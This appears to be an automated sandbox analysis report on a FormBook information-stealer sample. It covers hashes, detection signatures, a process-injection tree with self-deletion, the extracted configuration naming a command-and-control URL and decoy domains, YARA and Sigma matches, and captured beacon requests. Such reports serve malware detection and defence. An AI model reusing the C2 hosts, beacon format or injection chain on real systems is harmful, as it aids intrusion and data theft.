Loading ...

Play interactive tourEdit tour

Windows Analysis Report TPJX2QwEdXs5sTV.exe

Overview

General Information

Sample Name:TPJX2QwEdXs5sTV.exe
Analysis ID:483640
MD5:ce556ce97ea23cbc2940f2aad45d468f
SHA1:cc2bdaefa2f0ac108e2f456e42a42e8258580cf4
SHA256:7c3d5ebd2c417a52b2a0b98dee95b5a7f283816f6a2453ceeffd31becc140882
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TPJX2QwEdXs5sTV.exe (PID: 5056 cmdline: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' MD5: CE556CE97EA23CBC2940F2AAD45D468F)
    • RegSvcs.exe (PID: 5192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
    • RegSvcs.exe (PID: 4036 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmd.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • cmd.exe (PID: 4572 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.438451.com/t75f/"], "decoy": ["ice-lemon.pro", "ar3spro.cloud", "9055837.com", "fucksociety.net", "prettyofficialx.com", "mfxw.xyz", "relationshipquiz.info", "customia.xyz", "juanayjuan.com", "zidiankj.com", "facture-booking.com", "secondmining.store", "aboutyou.club", "gongxichen.com", "laurabraincreative.com", "pierrot-bros.com", "saintpaulaccountingservices.com", "dom-maya.com", "garderobamarzen.net", "la-salamandre-assurances.com", "pearmanprep.com", "telfarcontrol.com", "productsshareco.com", "cirf2021.online", "purchasevip.com", "cakewalkvision.com", "pointrenewables.com", "groups4n.com", "swnegce.xyz", "tjapro.com", "packagedesign.biz", "services-govgr.cloud", "shopgrassfedbeef.com", "tquilaint.com", "templetreemontessori.com", "munortiete.com", "nothingbutspotlesss.com", "fanpaixiu.xyz", "fr-site-amazon.com", "salartfinance.com", "beachers-shop.com", "friskvardaportalen.online", "pinsanova.site", "lemonvinyl.online", "indianadogeavaxsite.site", "styphon.com", "open24review-service.com", "bdjh9.xyz", "cocodiesel.com", "fortmyersfl.deals", "dsdtourism.com", "phone-il.net", "learningfactoryus.com", "incentreward.xyz", "travellerfund.com", "changcheng.pro", "cryptowalletts.com", "tradopplst.xyz", "autonomoustechnologyinc.com", "assessmentdna.xyz", "denicon-th.com", "dib5so.com", "genwealthbuilders.store", "delnetitcilo.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ab9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bcc:$sqlite3step: 68 34 1C 7B E1
    • 0x6ae8:$sqlite3text: 68 38 2A 90 C5
    • 0x6c0d:$sqlite3text: 68 38 2A 90 C5
    • 0x6afb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c23:$sqlite3blob: 68 53 D8 7F 8C
    00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 27 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cb9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dcc:$sqlite3step: 68 34 1C 7B E1
        • 0x15ce8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e0d:$sqlite3text: 68 38 2A 90 C5
        • 0x15cfb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e23:$sqlite3blob: 68 53 D8 7F 8C
        1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x68418:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x687a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x744b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x73fa1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x745b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x7472f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x691ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x7321c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x69f32:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x799a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x7aa4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 4 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' , ParentImage: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe, ParentProcessId: 5056, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5192
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe' , ParentImage: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe, ParentProcessId: 5056, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 5192

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.438451.com/t75f/"], "decoy": ["ice-lemon.pro", "ar3spro.cloud", "9055837.com", "fucksociety.net", "prettyofficialx.com", "mfxw.xyz", "relationshipquiz.info", "customia.xyz", "juanayjuan.com", "zidiankj.com", "facture-booking.com", "secondmining.store", "aboutyou.club", "gongxichen.com", "laurabraincreative.com", "pierrot-bros.com", "saintpaulaccountingservices.com", "dom-maya.com", "garderobamarzen.net", "la-salamandre-assurances.com", "pearmanprep.com", "telfarcontrol.com", "productsshareco.com", "cirf2021.online", "purchasevip.com", "cakewalkvision.com", "pointrenewables.com", "groups4n.com", "swnegce.xyz", "tjapro.com", "packagedesign.biz", "services-govgr.cloud", "shopgrassfedbeef.com", "tquilaint.com", "templetreemontessori.com", "munortiete.com", "nothingbutspotlesss.com", "fanpaixiu.xyz", "fr-site-amazon.com", "salartfinance.com", "beachers-shop.com", "friskvardaportalen.online", "pinsanova.site", "lemonvinyl.online", "indianadogeavaxsite.site", "styphon.com", "open24review-service.com", "bdjh9.xyz", "cocodiesel.com", "fortmyersfl.deals", "dsdtourism.com", "phone-il.net", "learningfactoryus.com", "incentreward.xyz", "travellerfund.com", "changcheng.pro", "cryptowalletts.com", "tradopplst.xyz", "autonomoustechnologyinc.com", "assessmentdna.xyz", "denicon-th.com", "dib5so.com", "genwealthbuilders.store", "delnetitcilo.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TPJX2QwEdXs5sTV.exeReversingLabs: Detection: 17%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY
          Source: 6.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: RegSvcs.pdb, source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.390723041.000000000105F000.00000040.00000001.sdmp, cmd.exe, 00000017.00000002.518459422.000000000369F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe, 00000017.00000002.511566191.0000000000870000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, cmd.exe
          Source: Binary string: RegSvcs.pdb source: cmd.exe, 00000017.00000002.521600812.0000000003AB7000.00000004.00020000.sdmp
          Source: Binary string: cmd.pdb source: RegSvcs.exe, 00000006.00000002.391607663.0000000002EB0000.00000040.00020000.sdmp, cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,23_2_0087B89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008868BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,23_2_008868BA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0088245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,23_2_0088245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008931DC FindFirstFileW,FindNextFileW,FindClose,23_2_008931DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008785EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,23_2_008785EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi6_2_004162C7

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.ice-lemon.pro
          Source: C:\Windows\explorer.exeDomain query: www.indianadogeavaxsite.site
          Source: C:\Windows\explorer.exeDomain query: www.munortiete.com
          Source: C:\Windows\explorer.exeDomain query: www.pierrot-bros.com
          Source: C:\Windows\explorer.exeNetwork Connect: 54.194.41.141 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.147.111 80Jump to behavior
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.fanpaixiu.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.438451.com/t75f/
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.indianadogeavaxsite.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.munortiete.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.247036337.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.246382239.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.246270583.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.comj
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.253864499.0000000006043000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlh
          Source: explorer.exe, 00000008.00000000.308790689.0000000006870000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252313565.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com)
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com-se
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252560675.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com?
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252833728.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comMic
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCd
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coma
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252394694.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comak
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252349501.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comd
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252876215.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comexc
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252434713.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml-g
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252560675.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml-se
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como._
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252225171.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comof
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252225171.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comona
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comue
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252876215.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comypoC
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.257664415.0000000006041000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.257568508.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.256412762.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.256690000.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258643842.000000000605E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258643842.000000000605E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlo
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258314127.000000000605E000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.258167734.0000000006041000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258749887.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers0.
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.258749887.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers3
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.259100620.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersD
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.256499107.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersH
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251297242.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn(
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251510361.0000000006040000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cncom
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnicr
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.262778713.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.260576945.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.250819017.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kX
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.250685229.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr-cY
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.250819017.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krV
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.260424917.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.245363117.0000000006022000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.245363117.0000000006022000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comt
